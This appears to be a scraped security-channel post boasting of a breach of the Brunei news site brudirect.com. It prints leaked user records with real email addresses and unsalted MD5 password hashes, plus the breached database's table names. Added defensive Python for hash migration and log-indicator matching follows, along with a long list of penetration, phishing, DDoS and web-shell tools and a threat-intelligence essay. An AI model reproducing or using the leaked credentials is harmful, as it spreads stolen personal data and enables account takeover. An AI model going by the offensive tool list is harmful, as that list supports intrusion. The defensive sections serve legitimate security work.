Channel: 🔰雚苁ℒ🔰

Brunei's No.1 news website hacked: brudirect data leak


Site: http://www.brudirect.com/ (Brunei's No.1 News Website)

Leaked user records. Columns: username, display name, password hash, confirm-password hash, email. Both hash columns hold identical 32-character hexadecimal digests, which is the shape of unsalted MD5; the "confirm password" value was persisted instead of being discarded after the comparison.
Khairul Izwan   izwan   c9d329c0765777980e7c77dfb06ecccb    c9d329c0765777980e7c77dfb06ecccb    izzzwan3@gmail.com
brudirect   brudirect   f0fdd0e77cbdf633b826c34fec10ef3a    f0fdd0e77cbdf633b826c34fec10ef3a    ram86laksh@gmail.com
babypynk    babypynk    897c8fde25c5cc5270cda61425eed3c8    897c8fde25c5cc5270cda61425eed3c8    babypynk@gmail.com
brudirect   brudirect   d8600f103434f9ef240b73b5c8eac220    d8600f103434f9ef240b73b5c8eac220    ram86laksh@gmail.com
kalis       kalis       1cdf846eb3e43d5efe1ff2732f88fd7e    1cdf846eb3e43d5efe1ff2732f88fd7e    admin@ brudirect.com
Vulnerability (screenshot): http://prntscr.com/jarjnp
Database brudirec_2k16db, tables:
54vxsya_banner
54vxsya_comics
54vxsya_dprayertimes
54vxsya_erates
54vxsya_events
54vxsya_ferryschedules
54vxsya_flightschedules
54vxsya_greetings
54vxsya_marquee
54vxsya_movieschedules
54vxsya_news
54vxsya_photooftheday
54vxsya_poll
54vxsya_prayertimes
54vxsya_psi
54vxsya_quote
54vxsya_season
54vxsya_sungkaipromo
54vxsya_user
54vxsya_videooftheweek
54vxsya_weatherforecast
counter_ips
counter_values
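The two hash columns in the dump are 32-character hexadecimal strings, the shape of an unsalted MD5 digest. As an added example, not code from the post or from the site's own software, the following Python shows the check and the fix a practitioner would apply to such a table: classify_hash() flags legacy digest formats by their shape, and verify_and_upgrade() rehashes a legacy MD5 account to salted PBKDF2 (standard library only) on its next successful login, without forcing a reset. The record layout and column names are assumed from the dump above; the sample record is constructed and is not one of the leaked rows.

```python
"""Added example: spotting and retiring unsalted-MD5 password storage.

Not from the original post. classify_hash() guesses the storage format from
the string's shape; verify_and_upgrade() checks a login against a legacy MD5
digest and, on success, replaces it with salted PBKDF2-HMAC-SHA256 so the
account is migrated without a forced reset. Column names are assumed.
"""
import hashlib
import hmac
import os
import re

_HEX = re.compile(r"^[0-9a-fA-F]+$")
PBKDF2_ROUNDS = 200_000  # tune so one verification costs ~100 ms on the login server


def classify_hash(stored: str) -> str:
    """Guess the password storage format from the shape of the stored value."""
    s = stored.strip()
    if s.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt"
    if s.startswith("$argon2"):
        return "argon2"
    if s.startswith("pbkdf2_sha256$"):
        return "pbkdf2_sha256 (salted)"
    if _HEX.match(s):
        # Bare hex of a fixed length is the signature of an unsalted digest.
        return {32: "unsalted MD5 (32 hex)",
                40: "unsalted SHA-1 (40 hex)",
                64: "unsalted SHA-256 (64 hex)"}.get(len(s), "bare hex digest")
    return "unknown"


def pbkdf2_hash(password: str, salt: bytes = None, rounds: int = PBKDF2_ROUNDS) -> str:
    """Return 'pbkdf2_sha256$<rounds>$<salt hex>$<dk hex>' with a fresh random salt."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return "pbkdf2_sha256$%d$%s$%s" % (rounds, salt.hex(), dk.hex())


def pbkdf2_verify(password: str, stored: str) -> bool:
    _, rounds, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)


def verify_and_upgrade(password: str, record: dict) -> bool:
    """Verify a login; a successful login against a legacy MD5 digest rewrites
    the record in place with PBKDF2 and drops the redundant confirm column."""
    stored = record["password"]
    kind = classify_hash(stored)
    if kind.startswith("pbkdf2_sha256"):
        return pbkdf2_verify(password, stored)
    if kind.startswith("unsalted MD5"):
        legacy = hashlib.md5(password.encode("utf-8")).hexdigest()
        if not hmac.compare_digest(legacy, stored.lower()):
            return False
        record["password"] = pbkdf2_hash(password)
        record.pop("confirm_password", None)  # never persist the confirm field
        return True
    return False  # unknown/other formats: force a reset rather than guess


# Constructed sample in the dump's column layout; NOT a leaked row.
SAMPLE_RECORD = {
    "username": "demo",
    "password": hashlib.md5(b"correct horse").hexdigest(),
    "confirm_password": hashlib.md5(b"correct horse").hexdigest(),
    "email": "demo@example.com",
}
```

Rows whose digest equals the MD5 of a common password are effectively plaintext, which is the argument for a forced reset when the legacy format is anything other than a slow, salted hash. PBKDF2 is used here because it ships with the standard library; bcrypt or Argon2id are preferable where a dependency is acceptable.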


The post "Brunei's No.1 news website hacked: brudirect data leak" appeared first on 🔰雚苁ℒ🔰.

Information security books: penetration analysis, hacker notes, vulnerability detection

Information security books

Blockchain security books

Red Sun Security Papers (红日安党Papers)

Red Sun Security Special Issue (红日安党䞓刊)

Selected security e-papers

Attack and defence competitions (CTF): write-ups

Web security books

  • Online-WebBook – SQL fundamentals tutorial
  • Online-WebBook – SQL injection attacks and defences
  • Online-WebBook – Web Hacking 101 (Chinese edition)
  • Online-WebBook – Kali Linux Web Penetration Testing Cookbook (Chinese edition)
  • Online-WebBook – Kali Linux Burp Suite practical guide
  • Online-WebBook – Penetration testing Node.js applications
  • Online-WebBook – Web security materials and resource list
  • Online-WebBook – Information security classified protection (等级保技) for new information technology applications
  • Online-WebBook – The Art of Deception
  • Online-WebBook – HTTP: The Definitive Guide
  • Online-WebBook – Web security penetration analysis
  • Online-WebBook – Web front-end hacking techniques revealed
  • Online-WebBook – Web application security threats and countermeasures
  • Online-WebBook – Web application vulnerability detection and defence
  • Online-WebBook – White Hat Talks Web Security (癜垜子讲Web安党)
  • Online-WebBook – Hacker penetration notes (complete edition)

Wi-Fi security books

  • Online-Wi-FiBook – Kali Linux Wireless Penetration Testing Beginner's Guide (Chinese edition)
  • Online-Wi-FiBook – Wireless network security attack and defence in practice (advanced)

PoC writing books

PHP code audit books

Android security books

  • Online-AndroidBook – Android penetration testing study manual (Chinese edition)
  • Online-AndroidBook – Android penetration testing attack and defence in practice (Chinese edition)
  • Online-AndroidBook – OWASP Mobile Top 10 vulnerabilities (Android)

Python programming books

Security conference slides

Security operations

  • Online-Report – Log analysis tips
  • Online-Report – Log management and analysis: the definitive guide

Penetration testing books

Network security analysis books

Reverse engineering security books

Social engineering books

Recommended reading list

Information security resource roundup: penetration testing targets, hacker tools

Contents: penetration testing practice targets, hacker tools, web security videos, penetration testing resources, penetration testing mind maps, CTF mind maps, Docker-based penetration testing platforms, PoC & exploit collections, vulnerability scanners, code audit, network security scanning tools, wireless network scanning tools, social engineering tools, reverse engineering tools, online vulnerability lists, information security conferences, information security magazines

Online resources

Web security videos

Penetration testing practice targets

  • WebGoat – WebGoat vulnerability practice environment
  • Damn Vulnerable Web Application – DVWA vulnerability practice platform
  • sqli-labs – SQL injection practice platform
  • kali-linux – Kali Linux installation tutorial

Penetration testing resources

  • Metasploit Unleashed – free Metasploit course
  • PTES – Penetration Testing Execution Standard
  • OWASP – Open Web Application Security Project
  • PENTEST-WIKI – open-source security testing methodology manual
  • Vulnerability Assessment Framework – penetration testing framework
  • XSS-Payloads – XSS payload constructions

Java web resources

  • Java-Web-Videos – [Stage 1] Java web fundamentals
  • Java-Web-Videos – [Stage 2] Java web advanced
  • Java-Web-Videos – [Stage 3] MySQL & JDBC
  • Java-Web-Videos – [Stage 4] Linux

Penetration testing mind maps

Web security mind maps

  • Web-Security – web security mind map

Mobile security mind maps

Secure development mind maps

  • Security – secure development mind map

CTF mind maps

  • Security – CTF mind map

Business security mind maps

  • Security – business security mind map

Docker-based penetration testing platforms

Web vulnerability Docker platforms

Host vulnerability Docker platforms

Python-based PoC & exploit collection

  • ActiveMQ – ActiveMQ PUT-upload getshell exploit (CVE-2016-3088)

Exploits

Social engineering

Security tools

Integrated penetration testing distributions

  • Kali – a Linux distribution for digital forensics and penetration testing.
  • ArchStrike – Arch GNU/Linux repository for security professionals and enthusiasts.
  • BlackArch – Arch GNU/Linux-based distribution for penetration testers and security researchers.
  • Network Security Toolkit (NST) – network security toolkit distribution.
  • Pentoo – security-focused LiveCD based on Gentoo.
  • BackBox – Ubuntu-based distribution for penetration testing and security assessment.
  • Parrot – Distribution similar to Kali, with multiple architecture.
  • Buscador – GNU/Linux virtual machine that is pre-configured for online investigators.
  • Fedora Security Lab – Provides a safe test environment to work on security auditing, forensics, system rescue and teaching security testing methodologies.
  • The Pentesters Framework – Distro organized around the Penetration Testing Execution Standard (PTES), providing a curated collection of utilities that eliminates often unused toolchains.

Penetration testing essentials

  • Metasploit Framework – the most widely used penetration testing software
  • burp suite – intercepting proxy for security testing of web applications
  • ExploitPack – Graphical tool for penetration testing with a bunch of exploits.
  • BeEF – Command and control server for delivering exploits to commandeered Web browsers.
  • faraday – Collaborative penetration test and vulnerability management platform.
  • evilgrade – The update exploitation framework.
  • routersploit – Automated penetration testing software for routers.
  • redsnarf – Post-exploitation tool for grabbing credentials.
  • Bella – Pure Python post-exploitation data mining & remote administration tool for Mac OS.
  • Offensive Web Testing Framework (OWTF) – Python-based framework for pentesting Web applications based on the OWASP Testing Guide.

Docker-based penetration testing tools

Vulnerability scanners

  • Nexpose – vulnerability management and risk control software
  • Nessus – vulnerability, configuration and compliance assessment
  • OpenVAS – open-source vulnerability scanner
  • Vuls – Agentless vulnerability scanner for GNU/Linux and FreeBSD, written in Go.

Code audit

  • Brakeman – Static analysis security vulnerability scanner for Ruby on Rails applications.
  • cppcheck – Extensible C/C++ static analyzer focused on finding bugs.
  • FindBugs – Free software static analyzer to look for bugs in Java code.
  • sobelow – Security-focused static analysis for the Phoenix Framework.

Web security scanning tools

  • Nikto – web server and web application vulnerability scanner
  • Arachni – Scriptable framework for evaluating the security of web applications.
  • w3af – web application attack and audit framework
  • Wapiti – Black box web application vulnerability scanner with built-in fuzzer.
  • SecApps – In-browser web application security testing suite.
  • WebReaver – Commercial, graphical web application vulnerability scanner designed for macOS.
  • WPScan – black-box WordPress vulnerability scanner
  • cms-explorer – Reveal the specific modules, plugins, components and themes that various websites powered by content management systems are running.
  • joomscan – Joomla vulnerability scanner.

Network security scanning tools

  • zmap – open-source network port scanner
  • nmap – free security scanner for network exploration and security auditing
  • pig – GNU/Linux packet crafting tool.
  • scanless – Utility for using websites to perform port scans on your behalf so as not to reveal your own IP.
  • tcpdump/libpcap – Common packet analyzer that runs under the command line.
  • Wireshark – network protocol analyzer for Unix and Windows
  • Network Tools – Different network tools: ping, lookup, whois, etc.
  • netsniff-ng – Swiss army knife for network sniffing.
  • Intercepter-NG – Multifunctional network toolkit.
  • SPARTA – Network infrastructure penetration testing tool.
  • dnschef – Highly configurable DNS proxy for pentesters.
  • DNSDumpster – Online DNS recon and search service.
  • CloudFail – Unmask server IP addresses hidden behind Cloudflare by searching old database records and detecting misconfigured DNS.
  • dnsenum – Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results.
  • dnsmap – Passive DNS network mapper.
  • dnsrecon – DNS enumeration script.
  • dnstracer – Determines where a given DNS server gets its information from, and follows the chain of DNS servers.
  • passivedns-client – Library and query tool for querying several passive DNS providers.
  • passivedns – Network sniffer that logs all DNS server replies for use in a passive DNS setup.
  • Mass Scan – TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
  • Zarp – Network attack tool centered around the exploitation of local networks.
  • mitmproxy – Interactive SSL-capable intercepting HTTP proxy for penetration testers and software developers.
  • Morpheus – Automated ettercap TCP/IP Hijacking tool.
  • mallory – HTTP/HTTPS proxy over SSH.
  • SSH MITM – Intercept SSH connections with a proxy; all plaintext passwords and sessions are logged to disk.
  • Netzob – Reverse engineering, traffic generation and fuzzing of communication protocols.
  • DET – Proof of concept to perform data exfiltration using either single or multiple channel(s) at the same time.
  • pwnat – Punches holes in firewalls and NATs.
  • dsniff – Collection of tools for network auditing and pentesting.
  • tgcd – Simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls.
  • smbmap – Handy SMB enumeration tool.
  • scapy – Python-based interactive packet manipulation program & library.
  • Dshell – Network forensic analysis framework.
  • Debookee (macOS) – Intercept traffic from any device on your network.
  • Dripcap – Caffeinated packet analyzer.
  • PRET – Printer Exploitation Toolkit offers commands useful for printer attacks and fuzzing.
  • Praeda – Automated multi-function printer data harvester for gathering usable data during security assessments.

Wireless network scanning tools

  • Aircrack-ng – Set of tools for auditing wireless networks.
  • Kismet – Wireless network detector, sniffer, and IDS.
  • Reaver – Brute force attack against WiFi Protected Setup.
  • Wifite – Automated wireless attack tool.

SSL/TLS scanning and analysis tools

  • SSLyze – SSL configuration scanner.
  • sslstrip – Demonstration of the HTTPS stripping attacks.
  • sslstrip2 – SSLStrip version to defeat HSTS.
  • tls_prober – Fingerprint a server’s SSL/TLS implementation.

Web exploitation

  • OWASP Zed Attack Proxy (ZAP) – Feature-rich, scriptable HTTP intercepting proxy and fuzzer for penetration testing web applications.
  • Fiddler – Free cross-platform web debugging proxy with user-friendly companion tools.
  • Burp Suite – Integrated platform for performing security testing of web applications.
  • autochrome – Easy to install a test browser with all the appropriate setting needed for web application testing with native Burp support, from NCCGroup.
  • WordPress Exploit Framework – Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
  • WPSploit – Exploit WordPress-powered websites with Metasploit.
  • SQLmap – Automatic SQL injection and database takeover tool.
  • tplmap – Automatic server-side template injection and Web server takeover tool.
  • weevely3 – Weaponized web shell.
  • Wappalyzer – Wappalyzer uncovers the technologies used on websites.
  • WhatWeb – Website fingerprinter.
  • BlindElephant – Web application fingerprinter.
  • wafw00f – Identifies and fingerprints Web Application Firewall (WAF) products.
  • fimap – Find, prepare, audit, exploit and even Google automatically for LFI/RFI bugs.
  • Kadabra – Automatic LFI exploiter and scanner.
  • Kadimus – LFI scan and exploit tool.
  • liffy – LFI exploitation tool.
  • Commix – Automated all-in-one operating system command injection and exploitation tool.
  • DVCS Ripper – Rip web accessible (distributed) version control systems: SVN/GIT/HG/BZR.
  • GitTools – Automatically find and download Web-accessible .git repositories.

Hex editors

  • HexEdit.js – Browser-based hex editing.
  • Hexinator – World’s finest (proprietary, commercial) Hex Editor.
  • Frhed – Binary file editor for Windows.

File format analysis tools

  • Kaitai Struct – File formats and network protocols dissection language and web IDE, generating parsers in C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.
  • Veles – Binary data visualization and analysis tool.
  • Hachoir – Python library to view and edit a binary stream as tree of fields and tools for metadata extraction.

Hash cracking tools

  • John the Ripper – Fast password cracker.
  • Hashcat – Faster, GPU-accelerated hash cracker.
  • CeWL – Generates custom wordlists by spidering a target’s website and collecting unique words.

DDoS tools

  • LOIC – Open source network stress tool for Windows.
  • JS LOIC – JavaScript in-browser version of LOIC.
  • SlowLoris – DoS tool that uses low bandwidth on the attacking side.
  • HOIC – Updated version of Low Orbit Ion Cannon, has ‘boosters’ to get around common counter measures.
  • T50 – Faster network stress tool.
  • UFONet – Abuses OSI layer 7 HTTP to create/manage ‘zombies’ and to conduct different attacks using; GET/POST, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc.

Social engineering tools

  • Social Engineer Toolkit (SET) – Open source pentesting framework designed for social engineering featuring a number of custom attack vectors to make believable attacks quickly.
  • King Phisher – Phishing campaign toolkit used for creating and managing multiple simultaneous phishing attacks with custom email and server content.
  • Evilginx – MITM attack framework used for phishing credentials and session cookies from any Web service.
  • wifiphisher – Automated phishing attacks against WiFi networks.
  • Catphish – Tool for phishing and corporate espionage written in Ruby.

Reverse engineering tools

  • IDA Pro – Windows, GNU/Linux or macOS hosted multi-processor disassembler and debugger.
  • IDA Free – The freeware version of IDA v5.0.
  • WDK/WinDbg – Windows Driver Kit and WinDbg.
  • OllyDbg – x86 debugger for Windows binaries that emphasizes binary code analysis.
  • Radare2 – Open source, crossplatform reverse engineering framework.
  • x64dbg – Open source x64/x32 debugger for windows.
  • Immunity Debugger – Powerful way to write exploits and analyze malware.
  • Evan’s Debugger – OllyDbg-like debugger for GNU/Linux.
  • Medusa disassembler – Open source interactive disassembler.
  • plasma – Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code.
  • peda – Python Exploit Development Assistance for GDB.
  • dnSpy – Tool to reverse engineer .NET assemblies.

CTF tools

  • ctf-tools – Collection of setup scripts to install various security research tools easily and quickly deployable to new machines.
  • Pwntools – Rapid exploit development framework built for use in CTFs.
  • RsaCtfTool – Decrypt data enciphered using weak RSA keys, and recover private keys from public keys using a variety of automated attacks.

Recommended online vulnerability databases

  • Common Vulnerabilities and Exposures (CVE) – Dictionary of common names (i.e., CVE Identifiers) for publicly known security vulnerabilities.
  • National Vulnerability Database (NVD) – United States government’s National Vulnerability Database provides additional meta-data (CPE, CVSS scoring) of the standard CVE List along with a fine-grained search engine.
  • US-CERT Vulnerability Notes Database – Summaries, technical details, remediation information, and lists of vendors affected by software vulnerabilities, aggregated by the United States Computer Emergency Response Team (US-CERT).
  • Full-Disclosure – Public, vendor-neutral forum for detailed discussion of vulnerabilities, often publishes details before many other sources.
  • Bugtraq (BID) – Software security bug identification database compiled from submissions to the SecurityFocus mailing list and other sources, operated by Symantec, Inc.
  • Exploit-DB – Non-profit project hosting exploits for software vulnerabilities, provided as a public service by Offensive Security.
  • Microsoft Security Bulletins – Announcements of security issues discovered in Microsoft software, published by the Microsoft Security Response Center (MSRC).
  • Microsoft Security Advisories – Archive of security advisories impacting Microsoft software.
  • Mozilla Foundation Security Advisories – Archive of security advisories impacting Mozilla software, including the Firefox Web Browser.
  • Packet Storm – Compendium of exploits, advisories, tools, and other security-related resources aggregated from across the industry.
  • CXSecurity – Archive of published CVE and Bugtraq software vulnerabilities cross-referenced with a Google dork database for discovering the listed vulnerability.
  • SecuriTeam – Independent source of software vulnerability information.
  • Vulnerability Lab – Open forum for security advisories organized by category of exploit target.
  • Zero Day Initiative – Bug bounty program with publicly accessible archive of published security advisories, operated by TippingPoint.
  • Vulners – Security database of software vulnerabilities.
  • Inj3ct0r (Onion service) – Exploit marketplace and vulnerability information aggregator.
  • Open Source Vulnerability Database (OSVDB) – Historical archive of security vulnerabilities in computerized equipment, no longer adding to its vulnerability database as of April, 2016. Continued by Risk Based Security as a commercial VDB.

Security courses

Information security conferences

  • DEF CON – Annual hacker convention in Las Vegas.
  • Black Hat – Annual security conference in Las Vegas.
  • BSides – Framework for organising and holding security conferences.
  • CCC – Annual meeting of the international hacker scene in Germany.
  • DerbyCon – Annual hacker conference based in Louisville.
  • PhreakNIC – Technology conference held annually in middle Tennessee.
  • ShmooCon – Annual US East coast hacker convention.
  • CarolinaCon – Infosec conference, held annually in North Carolina.
  • CHCon – Christchurch Hacker Con, Only South Island of New Zealand hacker con.
  • SummerCon – One of the oldest hacker conventions, held during Summer.
  • Hack.lu – Annual conference held in Luxembourg.
  • Hackfest – Largest hacking conference in Canada.
  • HITB – Deep-knowledge security conference held in Malaysia and The Netherlands.
  • Troopers – Annual international IT Security event with workshops held in Heidelberg, Germany.
  • Hack3rCon – Annual US hacker conference.
  • ThotCon – Annual US hacker conference held in Chicago.
  • LayerOne – Annual US security conference held every spring in Los Angeles.
  • DeepSec – Security Conference in Vienna, Austria.
  • SkyDogCon – Technology conference in Nashville.
  • SECUINSIDE – Security Conference in Seoul.
  • DefCamp – Largest Security Conference in Eastern Europe, held annually in Bucharest, Romania.
  • AppSecUSA – Annual conference organised by OWASP.
  • BruCON – Annual security conference in Belgium.
  • Infosecurity Europe – Europe’s number one information security event, held in London, UK.
  • Nullcon – Annual conference in Delhi and Goa, India.
  • RSA Conference USA – Annual security conference in San Francisco, California, USA.
  • Swiss Cyber Storm – Annual security conference in Lucerne, Switzerland.
  • Virus Bulletin Conference – Annual conference; the 2016 edition was held in Denver, USA.
  • Ekoparty – Largest Security Conference in Latin America, held annually in Buenos Aires, Argentina.
  • 44Con – Annual Security Conference held in London.
  • BalCCon – Balkan Computer Congress, held annually in Novi Sad, Serbia.
  • FSec – Croatian Information Security Gathering in Varaždin, Croatia.

Information security magazines

What is threat intelligence? Vulnerability databases, fingerprint databases, IP reputation databases

What is threat intelligence? The security community has been using it all along: vulnerability databases, fingerprint databases and IP reputation databases are all parts of threat intelligence. Intelligence means clues, and threat intelligence is every clue needed to reconstruct attacks that have already happened and to predict those that have not yet happened. "So-called threat intelligence is the knowledge that helps us discover threats and deal with them; that knowledge is what we call threat intelligence."

Internet security has been through the eras of rogue software fighting rogue software, hacker duels and gang wars. Today attackers are organised and premeditated, and defenders have reconnaissance and tactics: both attack and defence have moved beyond point-to-point tactics and rely more and more on an overall strategy. Put simply, people doing security now have to read Sun Tzu as well as the programming manuals. Once regular armies face each other, strategy has to become multidimensional: know yourself and know your enemy, and you will not be defeated in a hundred battles. Threat intelligence is the express courier bringing word of the enemy's movements.

In the Second World War the Allies, relying on the genius of Alan Turing, the father of the computer, broke the German ciphers and learned that Germany was about to bomb Coventry. To secure a larger and decisive victory, the Allies chose not to let the Germans learn that their cipher had been broken, and so took no targeted defensive measures for Coventry; the Germans went on believing their cipher was secure and walked step by step into the Allied trap. (This is a popular anecdote; historians dispute that Coventry was knowingly left undefended.)

In threat intelligence, security companies use similar methods against hackers. For example, they roam the big security forums posing as hackers, chatting happily about which attack methods are currently in fashion and which vulnerabilities can be exploited, and then go home and patch those vulnerabilities.

Through threat intelligence, then, an enterprise gains immunity to future attacks, which changes the attack-defence balance completely. A technique a hacker might once have used for a whole year is put under close watch as soon as it enters the threat intelligence; an attacker who reuses the same backdoor a second time has walked straight into the searchlight.

A well-known researcher has claimed that the United States is now exposing, in a planned and organised way, other countries' attacks on its infrastructure. Read carefully, this is chilling: it implies the US already holds precise threat intelligence and knows its attackers' attack paths thoroughly, and that, so as not to alert them, it has chosen not to expose 60-70% of those paths. The US is quietly watching its adversaries show off.

Having covered what threat intelligence is, next: what is it for, and who uses it?

From the individual's point of view: someone running proxy IPs to inflate traffic wants it in order to get around IP restrictions, and so does someone running botnet IPs; defenders want it, and so do attackers, who always want more of it than defenders and therefore reach their goals more easily. From the company's point of view, start with cooperation between projects: the WAF, scanner and vulnerability-management-platform teams can exchange vulnerability information; the anti-virus and intrusion-detection teams can exchange malicious samples; the business-fraud and network attack-and-defence teams can exchange IP reputation information. All of this integrates internal resources (security components such as scanners, WAFs and IPSs) and even external ones (open-source collections, exchanges with vendors). The reality is that the bigger the company, the more fragmented this information is; only once it is integrated can it give coordinated defence, and only then is there the capacity for the deep analysis that finds the attacks that genuinely matter and the advanced, hard-to-spot targeted APT attacks.

In the past we put too much effort into real-time defence, and still it did not stop every threat; that era is over. We need a complete defensive system running from defence through detection to response and, through threat intelligence, even prediction of attacks. At the core of all of this is holding large amounts of data and having strong data-analysis capability. Threat intelligence is the inevitable result of the defensive mindset moving, in the face of new forms of threat, from vulnerability-centred to threat-centred; together with big-data security analytics and kill-chain-based defence in depth it is becoming a cornerstone of the next generation of defensive systems.

Threat intelligence helps answer questions such as:

  • How do we keep up with the flood of security threat information: malicious attacks, attack methods, vulnerabilities, hacker targets and so on?
  • How do we gain the initiative against future security threats?
  • How do we report the danger and impact of a specific security threat to management?

What on earth is "threat intelligence"?

Put simply, threat intelligence is knowledge that helps people identify security threats and make definite decisions.

Threat intelligence has attracted much attention lately. Although there are many different definitions of it, the following are among the most frequently quoted:

Threat intelligence is evidence-based knowledge, including context, mechanisms, indicators, implications and actionable advice, about an existing or emerging menace or hazard to assets, which can be used to inform decisions about the subject's response to that menace or hazard.

Threat intelligence is the collection, evaluation and application of data about security threats, threat actors, exploits, malware, vulnerabilities and indicators of compromise.

Why is everyone talking about "threat intelligence"?

The Verizon 2015 Data Breach Investigations Report analysed 79,790 security incidents, with an estimated 700 million compromised records and financial losses of about 400 million US dollars.

As long as security threats and data breaches keep happening, every enterprise will look for ways to protect its data. The threat landscape changes constantly, and because of our dependence on IT systems our business risk keeps growing.

Security threats come from inside as well as outside. Organisations are under enormous, almost unbearable pressure to manage them effectively. Raw data is easy to get, though time-consuming to work through; turning it into meaningful information measured against configurable, effective metrics is not easy, and takes both time and effort.

That naturally pushes more and more users towards threat intelligence, which helps prioritise threats among the mass of data, alerts and attacks and provides actionable information.

The table below lists some common indicators of compromise (IOCs) that threat intelligence feeds can identify:

Category: Network
  Indicators: IP addresses; URLs; domain names
  Example: a malware infection, where a targeted internal host communicates with a known bad actor

Category: E-mail
  Indicators: sender address and subject line; attachments in the message; links in the message
  Example: phishing, where a user on an internal host clicks a link in a deceptive e-mail and the host calls back to a malicious command-and-control server

Category: Host-based
  Indicators: file names and file hashes (for example MD5); registry keys; dynamic link libraries (DLLs); mutex names
  Example: an external attack from a host that may become infected or is already infected

Threat intelligence capabilities

Attacks can be broadly classified as user-based, application-based and infrastructure-based threats. Some of the most common include SQL injection, DDoS, web application attacks and phishing.

It is essential to have a security solution that provides intelligence capability and manages these attacks through proactive action and timely response. Attackers keep changing their methods to challenge security systems, so organisations inevitably have to take threat intelligence from a wide range of sources.

One proven way of getting attacks under control is to detect and respond to threats through a security information and event management (SIEM) system. A SIEM can track everything that happens in the environment and identify anomalous activity. Isolated events may look irrelevant, but correlated with other events and with threat intelligence they reveal what is actually going on in the environment.

Today IT security professionals have to work on the assumption that a breach has already occurred. Comparing monitored traffic against threat intelligence on known bad actors helps identify malicious activity.

Done by hand, however, that is laborious and time-consuming. Integrating threat-intelligence indicators into a SIEM solution helps identify compromised systems and can even stop part of an attack.

Best practices

Integrating threat intelligence and responding to attacks is not nearly enough against a constantly changing threat landscape. You need to analyse the situation, determine the threats you are likely to face, and on that basis put preventive measures in place.

Some best practices for reference:

  • Keep an application allow list and deny list. This helps prevent the execution of malicious or unapproved programs, including DLLs, scripts and installers.
  • Examine the logs carefully to see whether an attempted attack was an isolated event or whether the vulnerability had been exploited before.
  • Determine what changes occurred during the attempted attack.
  • Audit the logs and determine why the event happened; the cause can be anything from a system vulnerability to an out-of-date driver.

What threat intelligence brings to a SIEM

A SIEM such as SolarWinds Log & Event Manager collects and normalises log data from monitored traffic and automatically flags suspicious events.

With an integrated threat-intelligence mechanism and built-in rules, monitored events can be compared against a continuously updated list of known threats.

You can quickly search and monitor real-time log data for hits from attacks and identify common indicators of compromise.

You can respond automatically to known malicious IP addresses to block attempted attacks.
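As an added example, not from the original article or from any SIEM product, the following Python performs the correlation described above: it matches parsed log events against indicators of the three kinds in the table (network, e-mail, host) and emits one alert per event with a hit, which is what a SIEM rule would raise for the analyst. The indicator values, field names and log lines are constructed for the demo and are not real intelligence.

```python
"""Added example: a SIEM-style indicator match over log events.

Not from the original article. match_event() checks one parsed event against
the three indicator kinds in the table above (network: IPs/CIDRs/domains/URLs;
e-mail: sender; host: file hash, mutex), and scan_log() runs it over JSON
lines. Indicator values, field names and log lines are constructed for the demo.
"""
import ipaddress
import json
import re

# Constructed indicator feed (hypothetical values, not real intelligence).
INDICATORS = {
    "ip": {"198.51.100.23"},
    "cidr": [ipaddress.ip_network("203.0.113.0/24")],
    "domain": {"cdn.bad.example", "update-check.example"},
    "md5": {"0123456789abcdef0123456789abcdef"},
    "sender": {"invoice@bad.example"},
    "mutex": {"Global\\x86vmware"},
}

_URL_HOST = re.compile(r"^[a-z][a-z0-9+.-]*://([^/:?#]+)")


def _domain_hit(host, bad_domains):
    """True if host or any parent domain is listed (sub.cdn.bad.example hits
    cdn.bad.example). Normalise case and the trailing dot from DNS logs."""
    labels = host.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in bad_domains for i in range(len(labels)))


def _ip_hit(value, ind):
    try:
        ip = ipaddress.ip_address(value)
    except ValueError:
        return False
    return str(ip) in ind["ip"] or any(ip in net for net in ind["cidr"])


def match_event(event, ind=INDICATORS):
    """Return [(field, indicator_type, value), ...] for one flat event dict."""
    hits = []
    for field in ("src_ip", "dst_ip"):
        if field in event and _ip_hit(event[field], ind):
            hits.append((field, "ip", event[field]))
    for field in ("dst_host", "query"):
        if field in event and _domain_hit(event[field], ind["domain"]):
            hits.append((field, "domain", event[field]))
    if "url" in event:
        m = _URL_HOST.match(event["url"].lower())
        if m and _domain_hit(m.group(1), ind["domain"]):
            hits.append(("url", "domain", event["url"]))
    if event.get("md5", "").lower() in ind["md5"]:
        hits.append(("md5", "hash", event["md5"]))
    if event.get("sender", "").lower() in ind["sender"]:
        hits.append(("sender", "email", event["sender"]))
    if event.get("mutex") in ind["mutex"]:
        hits.append(("mutex", "host", event["mutex"]))
    return hits


def scan_log(text, ind=INDICATORS):
    """One alert per event with at least one hit; the hits list is what a
    SIEM rule would attach to the alert for the analyst."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        hits = match_event(event, ind)
        if hits:
            alerts.append({"ts": event["ts"], "src": event["src"], "hits": hits})
    return alerts


# Constructed sample log: JSON lines from a proxy, firewall, mail gateway, EDR and DNS.
SAMPLE_LOG = r"""
{"ts":"2018-05-01T08:00:01Z","src":"proxy","src_ip":"10.0.0.5","url":"http://sub.cdn.bad.example/a.js"}
{"ts":"2018-05-01T08:00:02Z","src":"proxy","src_ip":"10.0.0.6","url":"https://intranet.corp.example/login"}
{"ts":"2018-05-01T08:00:03Z","src":"fw","src_ip":"10.0.0.5","dst_ip":"203.0.113.77","dport":443}
{"ts":"2018-05-01T08:00:04Z","src":"mail","sender":"Invoice@BAD.example","subject":"Invoice #1234"}
{"ts":"2018-05-01T08:00:05Z","src":"edr","host":"ws-05","md5":"0123456789ABCDEF0123456789ABCDEF","mutex":"Global\\x86vmware"}
{"ts":"2018-05-01T08:00:06Z","src":"dns","src_ip":"10.0.0.9","query":"www.example.org."}
"""
```

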